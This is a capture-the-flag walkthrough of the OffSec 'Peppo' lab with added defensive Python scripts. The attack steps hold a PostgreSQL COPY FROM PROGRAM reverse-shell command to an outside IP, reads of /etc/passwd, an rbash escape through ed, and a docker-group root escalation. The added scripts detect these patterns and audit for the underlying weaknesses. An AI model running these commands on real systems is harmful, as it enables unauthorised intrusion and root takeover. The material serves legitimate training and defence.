Peppo Walkthrough
Platform: Offsec | PG Practice
Difficulty: Very Difficult
OS: Linux
Author: Pawan Kumar (Vulntricks)
🛰️ 1. Reconnaissance
Quick Scan using RustScan
As usual, my favourite RustScan result:
└─$ rustscan -a $IP
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
113/tcp open ident syn-ack ttl 61
5432/tcp open postgresql syn-ack ttl 60
8080/tcp open http-proxy syn-ack ttl 60
10000/tcp open snet-sensor-mgmt syn-ack ttl 61
Nmap Scan Result
Now enumerating it further with nmap to see the service versions
└─$ nmap -sV -sC -p22,113,5432,8080,10000 -oN nmap_tcp $IP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 75:4c:02:01:fa:1e:9f:cc:e4:7b:52:fe:ba:36:85:a9 (RSA)
| 256 b7:6f:9c:2b:bf:fb:04:62:f4:18:c9:38:f4:3d:6b:2b (ECDSA)
|_ 256 98:7f:b6:40:ce:bb:b5:57:d5:d1:3c:65:72:74:87:c3 (ED25519)
|_auth-owners: root
113/tcp open ident FreeBSD identd
|_auth-owners: nobody
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
|_http-title: Redmine
| http-robots.txt: 4 disallowed entries
|_/issues/gantt /issues/calendar /activity /search
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
10000/tcp open snet-sensor-mgmt?
|_auth-owners: eleanor
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| HTTP/1.1 400 Bad Request
| Connection: close
| FourOhFourRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Mon, 07 Jul 2025 15:03:18 GMT
| Connection: close
| Hello World
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Mon, 07 Jul 2025 15:03:11 GMT
| Connection: close
|_ Hello World
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Port 22 SSH
Looks like the service is owned by the root user (_auth-owners: root).
This is what I could understand without much effort 🥸. We'll look deeper into it if needed.
Port 113 Ident
Looks interesting. I found that it is a server daemon that responds to requests on TCP port 113, returning the identity of the local user owning a given TCP connection.
Found a tool for user enumeration over ident, ident-user-enum.
└─$ ident-user-enum $IP 113
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.190.60:113 nobody
Confirmed again: we have a user nobody.
If we pass the SSH port as well, we get two users.
└─$ ident-user-enum $IP 113 22
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.190.60:113 nobody
192.168.190.60:22 root
Enumerating postgresql
Easy way is to try to connect to it using the default credentials postgres:postgres
└─$ psql -h 192.168.190.60 -p 5432 -U postgres
And successfully connected.
Listing databases
Enumerating further, I found in the HackTricks PostgreSQL enumeration section that we can read files from the machine by COPYing a server-side path into a table:
postgres=# CREATE TABLE demo(t text);
CREATE TABLE
postgres=# COPY demo from '/etc/passwd';
COPY 20
postgres=# SELECT * FROM demo;
Enumerating 8080 WEBrick httpd
What I could find is that WEBrick is an HTTP server toolkit that can be configured as an HTTPS server, a proxy server, and a virtual-host server. So basically a web server; I am interested in whether it is vulnerable or not...
Logged in to Redmine with admin:admin as user and password, and it asks me to change the password!!
So I updated the password and have admin access. Let's see; this could be a rabbit hole, so I have to be careful.
Some information looks important just because it shows versions...
Enumerating 10000
└─$ ident-user-enum 192.168.190.60 10000
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.190.60:10000 eleanor
⛔️ Initial Access
Found this Medium article for command execution in PostgreSQL;
so the idea is to create a table and then have COPY ... FROM PROGRAM execute a command, with its output landing in the table:
Create table shell
postgres=# CREATE TABLE shell(output text);
CREATE TABLE
Use the PROGRAM parameter to spawn the reverse shell (set up a listener first):
postgres=# COPY shell FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/192.168.45.169/80 0>&1"';
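Both COPY forms used above (COPY ... FROM '/etc/passwd' and COPY ... FROM PROGRAM) show up verbatim in the server log when log_statement = 'all' is set, so they are easy to alert on. The following is an added example, not part of the original walkthrough: it parses constructed log lines that mirror the queries above and flags server-side file reads, file writes and program execution. The log_line_prefix "%t [%p] %u@%d " that LINE_RE expects is an assumption; adjust it to your own setting. On PostgreSQL 11 and later these COPY forms require superuser or membership in pg_read_server_files / pg_write_server_files / pg_execute_server_program, so the root cause here is a network-exposed superuser with a default password rather than COPY itself.

```python
"""Added example (not from the original walkthrough): flag PostgreSQL statements
that read server-side files or run programs, as they appear in a log written
with log_statement = 'all'. The log lines are constructed to mirror the
walkthrough's queries."""
import re

# Constructed sample log. The prefix "%t [%p] %u@%d " is an assumed
# log_line_prefix; change LINE_RE if yours differs.
SAMPLE_LOG = """\
2025-07-07 15:10:01 UTC [2201] postgres@postgres LOG:  statement: SELECT version();
2025-07-07 15:10:05 UTC [2201] postgres@postgres LOG:  statement: CREATE TABLE demo(t text);
2025-07-07 15:10:09 UTC [2201] postgres@postgres LOG:  statement: COPY demo from '/etc/passwd';
2025-07-07 15:11:42 UTC [2201] postgres@postgres LOG:  statement: CREATE TABLE shell(output text);
2025-07-07 15:11:50 UTC [2201] postgres@postgres LOG:  statement: COPY shell FROM PROGRAM 'id';
2025-07-07 15:12:03 UTC [2203] app@app LOG:  statement: SELECT * FROM issues WHERE id = 7;
2025-07-07 15:12:10 UTC [2203] app@app LOG:  statement: select pg_read_file('/etc/hostname');
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement:\s+(?P<stmt>.*)$"
)

# Rules are checked in order; the first match decides the category.
# The normal client-side forms (COPY ... FROM STDIN / TO STDOUT) match none.
RULES = [
    ("server-side command execution",
     re.compile(r"\bCOPY\b.*\b(FROM|TO)\s+PROGRAM\b", re.I | re.S)),
    ("server-side file read",
     re.compile(r"\bCOPY\b.*\bFROM\s+'", re.I | re.S)),
    ("server-side file write",
     re.compile(r"\bCOPY\b.*\bTO\s+'", re.I | re.S)),
    ("server-side file read",
     re.compile(r"\b(pg_read_file|pg_read_binary_file|pg_ls_dir|lo_import)\s*\(", re.I)),
]


def classify_statement(stmt):
    """Return the finding category for one SQL statement, or None if benign."""
    for category, pattern in RULES:
        if pattern.search(stmt):
            return category
    return None


def scan_log(text):
    """Parse log lines and return one finding dict per suspicious statement."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # DETAIL/ERROR/continuation lines are not statements
        category = classify_statement(m.group("stmt"))
        if category:
            findings.append({
                "time": m.group("ts"),
                "pid": m.group("pid"),
                "user": m.group("user"),
                "db": m.group("db"),
                "category": category,
                "statement": m.group("stmt"),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} pid={f['pid']} {f['user']}@{f['db']} "
              f"[{f['category']}] {f['statement']}")
```

Run against the constructed log it reports three lines: the /etc/passwd read, the PROGRAM execution, and the pg_read_file call, while the ordinary SELECT and CREATE TABLE statements are ignored. In production, pair this with a pg_hba.conf that does not allow password logins for postgres from arbitrary hosts.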
Post Exploitation Enumeration
Quick check on resources
for cmd in gcc cc python perl python3 python2 wget curl fetch nc ncat nc.traditional socat; do which $cmd >/dev/null 2>&1 && echo "[✔] $cmd: $(which $cmd)" || echo "[✘] $cmd: Not found"; done
Looks like we have perl, so let's get a TTY shell.
Tried breaking out of the shell but failed...
postgres@326cfee15738:~/data$ cd /home
cd /home
postgres@326cfee15738:/home$ ls
ls
postgres@326cfee15738:/home$ ls -lsa
ls -lsa
total 8
4 drwxr-xr-x 2 root root 4096 May 2 2020 .
4 drwxr-xr-x 1 root root 4096 Jun 1 2020 ..
postgres@326cfee15738:/home$ pwd
pwd
/home
postgres@326cfee15738:/home$ cd ..
Could not see any other user when logged in through this shell.
Access using the SSH credentials given by the lab:
eleanor:eleanor
Check what the shell allows:
eleanor@peppo:~$ echo $SHELL
/bin/rbash
eleanor@peppo:~$ cd /home/eleanor/bin
-rbash: cd: restricted
eleanor@peppo:~$ ls
bin helloworld local.txt
eleanor@peppo:~$ cat local.txt
-rbash: cat: command not found
eleanor@peppo:~$ echo $PATH
/home/eleanor/bin
Can't execute commands, so I looked for a way out and found an article on rbash on TecMint.
Let's try to break out of the shell:
eleanor@peppo:~$ ls -lsa /home/eleanor/bin
total 8
4 drwxr-xr-x 2 eleanor eleanor 4096 Jun 1 2020 .
4 drwxr-xr-x 4 eleanor eleanor 4096 Jul 9 2020 ..
0 lrwxrwxrwx 1 root root 10 Jun 1 2020 chmod -> /bin/chmod
0 lrwxrwxrwx 1 root root 10 Jun 1 2020 chown -> /bin/chown
0 lrwxrwxrwx 1 root root 7 Jun 1 2020 ed -> /bin/ed
0 lrwxrwxrwx 1 root root 7 Jun 1 2020 ls -> /bin/ls
0 lrwxrwxrwx 1 root root 7 Jun 1 2020 mv -> /bin/mv
0 lrwxrwxrwx 1 root root 9 Jun 1 2020 ping -> /bin/ping
0 lrwxrwxrwx 1 root root 10 Jun 1 2020 sleep -> /bin/sleep
0 lrwxrwxrwx 1 root root 14 Jun 1 2020 touch -> /usr/bin/touch
So we can execute only a limited set of commands. I could change the shell using ed:
eleanor@peppo:~$ ed
!/bin/sh
$ whoami
/bin/sh: 1: whoami: not found
$ echo $SHELL
/bin/rbash
$ echo $PATH
/home/eleanor/bin
$ ed
!/bin/bash
eleanor@peppo:~$ whoami
bash: whoami: command not found
eleanor@peppo:~$ sudo ed
bash: sudo: command not found
eleanor@peppo:~$
Let's try updating the path again ...
eleanor@peppo:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
eleanor@peppo:~$ pwd
/home/eleanor
eleanor@peppo:~$ whoami
eleanor
Now we can execute commands after updating the path ... Good news ...
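Two things in the listing above explain why this rbash jail fell over: ed is on the allow-list and can start another program with !, and the bin directory itself is owned by eleanor, so the allow-list is hers to edit. rbash refuses to change PATH or SHELL, but a /bin/sh started from an allowed program is not restricted, which is exactly what the export PATH step shows. As an added example (not part of the original walkthrough), the script below parses an ls -lsa listing like the one above and reports both problems; SAMPLE_LISTING is a constructed copy of the walkthrough's output and the set of tools treated as shell-escapes is an assumption you should extend for your own environment.

```python
"""Added example (not from the original walkthrough): audit the directory an
rbash user is confined to, from an `ls -lsa` listing of that directory."""
import os
import re

# Constructed listing, copied from the walkthrough's /home/eleanor/bin output.
SAMPLE_LISTING = """\
total 8
4 drwxr-xr-x 2 eleanor eleanor 4096 Jun 1 2020 .
4 drwxr-xr-x 4 eleanor eleanor 4096 Jul 9 2020 ..
0 lrwxrwxrwx 1 root root 10 Jun 1 2020 chmod -> /bin/chmod
0 lrwxrwxrwx 1 root root 10 Jun 1 2020 chown -> /bin/chown
0 lrwxrwxrwx 1 root root 7 Jun 1 2020 ed -> /bin/ed
0 lrwxrwxrwx 1 root root 7 Jun 1 2020 ls -> /bin/ls
0 lrwxrwxrwx 1 root root 7 Jun 1 2020 mv -> /bin/mv
0 lrwxrwxrwx 1 root root 9 Jun 1 2020 ping -> /bin/ping
0 lrwxrwxrwx 1 root root 10 Jun 1 2020 sleep -> /bin/sleep
0 lrwxrwxrwx 1 root root 14 Jun 1 2020 touch -> /usr/bin/touch
"""

# Programs that can start another program from inside themselves (editors,
# pagers, interpreters). Assumed starting set; extend it for your own host.
SHELL_ESCAPE_TOOLS = {"ed", "vi", "vim", "less", "more", "man", "awk",
                      "find", "perl", "python", "python3"}

LS_RE = re.compile(
    r"^\s*(?P<blocks>\d+)\s+(?P<mode>[\-dlcbps][rwxsStT\-]{9})\s+(?P<links>\d+)\s+"
    r"(?P<owner>\S+)\s+(?P<group>\S+)\s+(?P<size>\d+)\s+"
    r"(?P<date>\S+\s+\d+\s+\S+)\s+(?P<name>.*)$"
)


def parse_ls_line(line):
    """Parse one `ls -lsa` line into a dict; symlinks get a 'target' value."""
    m = LS_RE.match(line)
    if not m:
        return None  # "total N" and blank lines
    entry = m.groupdict()
    name, sep, target = entry["name"].partition(" -> ")
    entry["name"] = name
    entry["target"] = target if sep else None
    return entry


def audit_restricted_bin(listing, user):
    """Return (kind, detail) findings for a restricted user's bin directory."""
    findings = []
    for line in listing.splitlines():
        e = parse_ls_line(line)
        if e is None:
            continue
        mode = e["mode"]  # e.g. drwxr-xr-x: index 2 = owner write, 8 = other write
        if e["name"] == ".":
            # If the restricted user can write the directory, she can add or
            # replace entries, so the allow-list is not enforced by root.
            if (e["owner"] == user and mode[2] == "w") or mode[8] == "w":
                findings.append(("writable-bin-dir",
                                 f"bin dir owned by {e['owner']} mode {mode}"))
            continue
        if e["name"] == "..":
            continue
        if e["owner"] == user and mode[2] == "w":
            findings.append(("user-owned-entry", e["name"]))
        resolved = e["target"] or e["name"]
        if os.path.basename(resolved) in SHELL_ESCAPE_TOOLS:
            label = f"{e['name']} -> {e['target']}" if e["target"] else e["name"]
            findings.append(("shell-escape", label))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_restricted_bin(SAMPLE_LISTING, "eleanor"):
        print(f"[{kind}] {detail}")
```

On the walkthrough's listing it reports the eleanor-owned, owner-writable bin directory and the ed symlink. The fix is the usual one for restricted shells: root owns the bin directory, every entry is a symlink to a program that cannot spawn subprocesses, and the account is given only what its job needs (here, probably nothing more than a forced command).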
Privilege Escalation
Unable to download anything
eleanor@peppo:~$ cat /etc/group
.
.
.
.
ssh:x:111:
eleanor:x:1000:
docker:x:999:eleanor
So the docker group is the one notable group eleanor belongs to...
eleanor@peppo:~$ which docker
/usr/bin/docker
eleanor@peppo:~$ ls -lsa /usr/bin/docker
82972 -rwxr-xr-x 1 root root 84959304 May 28 2020 /usr/bin/docker
So docker is owned by root, and eleanor is a member of the docker group.
eleanor@peppo:~/helloworld$ ls -lsa -u /usr/bin/docker
82972 -rwxr-xr-x 1 root root 84959304 Jul 9 14:01 /usr/bin/docker
eleanor@peppo:~/helloworld$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
redmine latest 0c8429c66e07 5 years ago 542MB
postgres latest adf2b126dda8 5 years ago 313MB
eleanor@peppo:~/helloworld$ docker run -v /:/mnt --rm -it redmine chroot /mnt sh
# whoami
root
#
This docker command comes from GTFOBins.
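The root cause here is membership in the docker group: anyone who can talk to the Docker socket can bind-mount / into a container and chroot into it, which is what the command above does, so docker group membership is root access in all but name. As an added example (not part of the original walkthrough), the script below audits /etc/group for non-root members of root-equivalent groups, and uses /etc/passwd to catch users whose primary group is one of them, which /etc/group alone does not show. The docker line in SAMPLE_GROUP matches the walkthrough; the rest of both sample files, including the ops user, is constructed, and the list of groups treated as root-equivalent is an assumption to adapt to your distribution.

```python
"""Added example (not from the original walkthrough): find users whose group
membership is effectively root, from /etc/group and /etc/passwd contents."""

# Groups whose members can obtain root or bypass file permissions on a typical
# host. Assumed list; adapt it to your distribution and local policy.
ROOT_EQUIVALENT_GROUPS = {
    "docker": "can run containers that mount / and chroot into it as root",
    "lxd": "can launch privileged containers with the host filesystem mounted",
    "sudo": "may run commands as root (subject to sudoers)",
    "wheel": "may run commands as root (subject to sudoers / su policy)",
    "disk": "can read and write raw block devices, bypassing file permissions",
    "shadow": "can read password hashes from /etc/shadow",
}

# Constructed /etc/group; the docker line is the one from the walkthrough.
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:
sudo:x:27:
ssh:x:111:
eleanor:x:1000:
docker:x:999:eleanor
"""

# Constructed /etc/passwd. 'ops' has docker (gid 999) as its primary group,
# which /etc/group alone does not reveal.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
eleanor:x:1000:1000::/home/eleanor:/bin/rbash
ops:x:1001:999::/home/ops:/bin/bash
"""


def parse_group(text):
    """Map group name -> (gid, set of explicitly listed members)."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def parse_passwd(text):
    """Map user name -> primary gid."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        users[fields[0]] = int(fields[3])
    return users


def audit_groups(group_text, passwd_text=""):
    """Return (group, user, how) for every non-root user in a root-equivalent group."""
    groups = parse_group(group_text)
    primary = parse_passwd(passwd_text)
    gid_to_name = {gid: name for name, (gid, _members) in groups.items()}
    findings = []
    for name, (_gid, members) in groups.items():
        if name not in ROOT_EQUIVALENT_GROUPS:
            continue
        for user in sorted(members):
            if user != "root":
                findings.append((name, user, "secondary"))
    for user, gid in primary.items():
        gname = gid_to_name.get(gid)
        if gname in ROOT_EQUIVALENT_GROUPS and user != "root":
            findings.append((gname, user, "primary"))
    return findings


if __name__ == "__main__":
    for group, user, how in audit_groups(SAMPLE_GROUP, SAMPLE_PASSWD):
        print(f"{user} is a {how} member of {group}: {ROOT_EQUIVALENT_GROUPS[group]}")
```

On a real host, feed it the contents of /etc/group and /etc/passwd. Every hit should map to an explicit decision to grant that person root; where it does not, remove the membership, and if users genuinely need to run containers, prefer rootless Docker or a narrowly scoped sudo rule over the docker group.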